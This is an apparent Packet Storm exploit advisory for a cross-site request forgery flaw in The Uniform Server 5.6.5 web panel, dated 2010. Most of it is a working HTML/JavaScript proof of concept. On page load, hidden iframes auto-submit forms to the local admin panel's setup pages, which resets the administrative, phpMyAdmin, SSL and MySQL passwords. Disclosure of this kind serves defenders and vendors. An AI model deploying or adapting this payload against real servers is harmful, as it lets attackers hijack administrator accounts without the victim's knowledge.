The Uniform Server version 5.6.5 suffers from a cross site request forgery vulnerability.
cf30264daece6b7ac5bb477b8a449fbcd90cb357dbf9785b898400624e428a80<!--=========================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Cross-site Request Forgery #
# Software.................The Uniform Server 5.6.5 #
# Download.................http://sourceforge.net/projects/miniserver/files/Uniform%20Server/ #
# Date.....................5/15/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# A cross-site request forgery vunlerability in The Uniform Server 5.6.5 web UI can be exploited to change #
# various administrative passwords. #
# #
# #
# ##Proof of Concept## -->
<html>
<head>
<script type="text/javascript">
window.onload = function() {
var url = 'http://localhost/apanel';
var xsrs = [
{
"action": url + "/apsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "apuser", "value": "new_username" },
{ "name": "appass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/psetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/sslpsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/mqsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "qpass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
}
];
for (var x = 0; x < xsrs.length; x++) {
var attackFrame = document.createElement('iframe');
var html = '<html><body><form action="' + xsrs[x].action + '" ' +
'method="' + xsrs[x].method + '">';
for (var y = 0; y < xsrs[x].fields.length; y++) {
html += '<input type="' +
(xsrs[x].fields[y].type != null ? xsrs[x].fields[y].type : 'hidden') + '" ' +
'name="' + xsrs[x].fields[y].name + '" ' +
'value="' + xsrs[x].fields[y].value + '" />';
}
html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';
document.body.appendChild(attackFrame);
attackFrame.contentDocument.write(html);
}
}
</script>
</head>
<body>
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed